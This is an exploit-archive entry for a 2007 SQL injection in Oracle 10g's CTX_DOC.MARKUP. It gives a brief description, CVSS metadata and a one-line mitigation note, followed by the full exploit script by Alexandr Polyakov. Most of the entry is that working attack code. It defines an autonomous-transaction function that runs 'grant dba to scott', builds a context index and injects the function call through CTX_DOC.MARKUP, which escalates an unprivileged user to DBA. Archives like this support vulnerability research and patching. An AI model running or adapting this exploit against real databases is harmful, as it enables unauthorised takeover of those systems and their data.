Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit

vendor:

Oracle Database

by:

Alexandr 'Sh2kerr' Polyakov

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Oracle Database

Affected Version From: Oracle 10g

Affected Version To: Oracle 10g

Patch Exists: NO

Related CWE:

CPE: a:oracle:oracle_database:10g

Metasploit:

Other Scripts:

Platforms Tested: Oracle 10.1.0.2.0

2007

Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit

This exploit allows an attacker to grant DBA privileges to an unprivileged user in Oracle 10g by exploiting the CTX_DOC.MARKUP function. The exploit involves creating a function called HACKIT that executes a dynamic SQL statement to grant the DBA role to the user 'scott'. The function is then called, granting the DBA role to the user. This vulnerability was reported by David Litchfield in June 2005 and was publicly disclosed on October 17, 2007. This exploit has been tested on Oracle 10.1.0.2.0.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the necessary patches provided by Oracle. Additionally, it is important to regularly update and apply security patches to all Oracle software installations.

Source

Exploit-DB raw data:

/******************************************************************/
/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/
/******************************************************************/
/************ sploit grant DBA to unprivileged user ***************/
/******************************************************************/
/******************  BY Sh2kerR (Digital Security)  ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0  *******************/
/******************************************************************/
/******************************************************************/
/*         Date of Public EXPLOIT:  October 23, 2007              */
/*         Written by:              Alexandr "Sh2kerr" Polyakov   */
/*         email:                   Alexandr.Polyakov@dsec.ru     */
/*         site:                    http://www.dsec.ru            */
/******************************************************************/
/*  Original Advisory by:                                         */
/*        David Litchfield [ davidl@ngssoftware.com ]             */
/*        Reported: 6 June 2005                                   */
/*        Date of Public Advisory: October 17, 2007               */
/*        Advisory number: #NISR17102007A                         */
/*                                                                */
/******************************************************************/

select * from user_role_privs;


CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
RETURN '';
END;
/


set serveroutput on

create table mark_tab (id number primary key, text varchar2(80) );

insert into mark_tab values ('1', 'All your bases are belong to US');

create index mark_tab_idx on mark_tab(text)
        indextype is ctxsys.context parameters
        ('filter ctxsys.null_filter');


SET SERVEROUTPUT ON;
DECLARE
     mklob CLOB;
     amt NUMBER := 40;
     line VARCHAR2(80);
     BEGIN
       CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
       DBMS_LOB.READ(mklob, amt, 1, line);
       DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
       DBMS_LOB.FREETEMPORARY(mklob);
       END;
     /


select * from user_role_privs;

/******************************************************************/
/*************************** SEE U LATER  ;)  ***********************/
/******************************************************************/

// milw0rm.com [2007-10-23]